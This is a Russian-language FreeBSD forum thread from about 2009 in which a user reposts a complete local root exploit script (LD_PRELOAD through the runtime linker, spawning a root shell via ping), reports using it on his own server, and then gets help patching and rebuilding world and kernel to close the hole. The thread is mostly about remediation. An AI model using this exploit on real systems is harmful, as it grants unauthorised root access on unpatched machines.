Люди это [censored]!

[fox]

Доброй ночи, прошу меня извинить за не цензуру, я перевозбуждён, но есть причины!
Случайно рылся в инете и нашёл вот это:
http://seclists.org/fulldisclosure/2009/Nov/371
Затем вот это:
http://www.xakep.ru/post/50314/default.asp
Не долго думая, зашёл под самым безобидным пользователем, юзнул этот скрипт:

Код: Выделить всё

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Не потратил больше 15 минут, немного манипуляций с master.passwd и создал нужного пользователя а затем root пароль убрал, и что вы думает захватил свой сервер!
Осталось только одно отшлифовать, найти способ загрузить скрипт и безобидного пользователя, даже не из группы wheel…
Не знаю, возможно многие из вас уже читали об этом, но мне кажется масштаб этого экплоита велик!!! Есть о чём задуматься, я в шоке!!!

[Хостинг HostFood.ru]

Тарифы на хостинг в России, от 12 рублей: https://www.host-food.ru/tariffs/hosting/
Тарифы на виртуальные сервера (VPS/VDS/KVM) в РФ, от 189 руб.: https://www.host-food.ru/tariffs/virtualny-server-vps/
Выделенные сервера, Россия, Москва, от 2000 рублей (HP Proliant G5, Intel Xeon E5430 (2.66GHz, Quad-Core, 12Mb), 8Gb RAM, 2x300Gb SAS HDD, P400i, 512Mb, BBU):
https://www.host-food.ru/tariffs/vydelennyi-server-ds/
Недорогие домены в популярных зонах: https://www.host-food.ru/domains/

[zg]

найти способ загрузить скрипт и безобидного пользователя, даже не из группы wheel…

любой хостинг, хоть платный, хоть бесплатный

стоит, однако, задуматься...

[f_andrey]

стоит, однако, задуматься...

О да это обычно не лишне, только смотрим сначала на название раздела, потом можно еше немного подумать

Ну и мотивационна картинка

[iye]

А я почему то всегда думал что шел доступен только на виртуальных машинах... у всех остальных в качестве шела стоит /usr/sbin/nologin а все скрипты выполняются в chroot окружении...

[hizel]

опять хладоген потек? надо быть внимательнее что-ли

[terminus]

[::||||||||/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\||||||||::]

Код: Выделить всё

November 2009

[princeps]

я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252

[fox]

я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252

Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!

[iye]

По линку пробегала ссылка : http://people.freebsd.org/~cperciva/rtld.patch

[fox]

По линку пробегала ссылка : http://people.freebsd.org/~cperciva/rtld.patch

Извините за не скромный вопрос, а как им пользоваться?
Не получается...

[iye]

НАмекаю ) Открой ссылку ) Открой )

я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252

Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!

[princeps]

Важно то, как закрыть эту бреш?????Патчь нужен!!!!

Обновиться? Да и подпишись уже на security-advisories, чтобы узнавать о критических уязвимостях не через три месяца

[fox]

НАмекаю ) Открой ссылку ) Открой )

я так понимаю, боян: http://forum.lissyara.su/viewtopic.php?f=46&t=22252

Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!

Открыл, но патч не катит, чо то:

Код: Выделить всё

# patch < path.path
Hmm...  Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c     (revision 199977)
|+++ rtld.c     (working copy)
--------------------------
File to patch: /usr/src/libexec/rtld-elf/rtld.c
Patching file /usr/src/libexec/rtld-elf/rtld.c using Plan A...
Hunk #1 failed at 366.
1 out of 1 hunks failed--saving rejects to /usr/src/libexec/rtld-elf/rtld.c.rej
Hmm...  Ignoring the trailing garbage.
done

[fox]

Важно то, как закрыть эту бреш?????Патчь нужен!!!!

Обновиться? Да и подпишись уже на security-advisories, чтобы узнавать о критических уязвимостях не через три месяца

А как это сделать? Любезный, не подскажите?

[princeps]

ну отчего же не подсказать хорошему человеку: http://lists.freebsd.org/mailman/listin ... ifications
И следи за разделом "новости", там обычно самые важные обновления обсуждаются.

[fox]

Я пологаю, может быть я не прав, нужно вот по этой ссылке:
http://security.freebsd.org/advisories/ ... 6.rtld.asc
Там есть откуда, что скачать а затем:

# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/libexec/rtld-elf
# make obj && make depend && make && make install

Так что ли?

[fox]

ну отчего же не подсказать хорошему человеку: http://lists.freebsd.org/mailman/listin ... ifications
И следи за разделом "новости", там обычно самые важные обновления обсуждаются.

Спасибо огромное!

[iye]

Думаю стоит попробовать собрать, если соберется отбэкапиться и попробовать проинсталить и посмотреть что получится.

[princeps]

Я пологаю, может быть я не прав, нужно вот по этой ссылке:http://security.freebsd.org/advisories/ ... 6.rtld.ascТам есть откуда, что скачать а затем:

обнови исходники и обнови систему по хэндбуку. и будет тебе счастье. С тех пор, ещё уязвимости были, в январе.

[fox]

Я пологаю, может быть я не прав, нужно вот по этой ссылке:http://security.freebsd.org/advisories/ ... 6.rtld.ascТам есть откуда, что скачать а затем:

обнови исходники и обнови систему по хэндбуку. и будет тебе счастье. С тех пор, ещё уязвимости были, в январе.

Так вы предлогаете полность мир пересобрать?
А если мир пересобирать, я извсеняюсь может быть это покажется глупым но боюсь ошибиться, патчить нужно если мир пересобирать, или разработчики уже побеспакоились за меня?

[princeps]

патчить нужно если мир пересобирать,

не нужно. И пересобирать надо не только мир, но и ядро. И обязательно обнови исходники сначала, иначе толку не будет.

[fox]

патчить нужно если мир пересобирать,

не нужно. И пересобирать надо не только мир, но и ядро. И обязательно обнови исходники сначала, иначе толку не будет.

Ну это понятно, обновить, а потом полный фарш пересборки всего насвети (мира, ядра)...
Спасибо, за внимание!

[fox]

Всё класс, после апгрейда!!!
Получилось, я там ещё нашёл одного эксплоита, тот ядро переполнял, но после апгрейда всё классно, закрыто!
Спасибо всем за участие!

[schizoid]

а что freebsd-update fetch не проканает разве? или по-любому мир/ядро пересобирать?

[princeps]

проканает, наверное, почему не проканать? я пересобираю, мне это как-то надёжнее кажется.